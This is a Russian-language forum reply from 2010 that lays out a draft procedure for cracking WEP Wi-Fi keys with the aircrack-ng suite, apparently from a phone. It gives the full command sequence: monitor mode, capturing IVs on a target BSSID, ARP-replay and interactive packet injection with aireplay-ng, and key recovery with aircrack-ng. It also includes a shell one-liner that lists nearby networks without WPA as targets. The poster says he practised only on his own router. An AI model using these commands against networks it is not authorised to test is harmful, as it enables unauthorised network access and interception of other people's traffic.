Re: aircrack
DiMe
Читайте тут:
http://forum.antichat.ru/threadnav107039-1-10.html
Тут далеко не в один клик все делается.
Ах да... без kernel-power прога работать как надо не будет.
Добавлено: 14.12.2010 18:59:43
Набивать тонну команд в маленьком окошке - то еще удовольствие.
Я делал так: подключался к телефону через USB по ssh, переводил вай-фай в нужный режим и фигачил все с компа.
Так как я сам еще не придумал определенный алгоритм и не поломал ни одной сетки (но почти получилось - но устал пакеты ловить)... не написал еще скрипт для взлома в один клик. Хотя, когда-нибудь сделаю это, скорее всего.
Вот мой черновой алгоритм взлома:
1) Переводим вай-фай в режим мониторинга:
airmon-ng start wlan02) Смотрим список сетей, выбираем среди них WEP
airodump-ng wlan03) Для успешного проведения атаки к точке доступа должна быть подключена
хотя бы одна активная машина, чем больше трафик у которой,
тем быстрее будет подобран ключ.
Включаем режим снифинга и накапливаем статистику.
Чем длиннее WEP-ключ тем больше пакетов необходимо
перехватить (64-битный ключ требует накопления примерно 6000 пакетов):airodump-ng -i -c 6 --bssid 00:14:D1:3B:5A:4F -w data-capture wlan0
-i захватыавем только IV's (data)
где, "-c 6" - номер канала беспроводной точки доступа
(см. вывод airodump-ng wlan0). В опции --bssid указан идентификатор
точки доступа, для отсеивания лишнего трафика. Все перехваченные
пакеты будут сохранены в файле data-capture-01.cap.4) Делаем атаку на набор пакетов:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
или
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
5) После накопления достаточного объема статистики подбираем WEP-ключ
(выполняем операцию не прерывая процесс снифинга, так как
числа перехваченных пакетов может не хватить):aircrack-ng -z data-capture-01.cap
илиaircrack-ng -z -n 128 data-capture-01.cap
====================================
Вывод карты из режима мониторинга в нормальный:
ifconfig wlan0 down
iwconfig wlan0 mode Managed
ifconfig wlan0 up====================================
Скрипт для поиска уязвимых сетей (не проверял вроде):
iwlist wlan0 scanning | grep -e ESSID -e Encryption -e WPA -e Channel -e Address | grep -v Frequency | sed 's/Address:/net/' | sed 's/Cell [0-9]* -//' | sed 's/^.*Channel://' | sed 's/^.*Encryption key:/enc-/' | sed 's/^.*ESSID://' | sed 's/^.*IE: //' | tr '\n' '|' | sed 's/ /\t/g' | tr '\t' '\n' | grep -v WPA
=====================================
Ломать пытался специально настроенный свой роутер.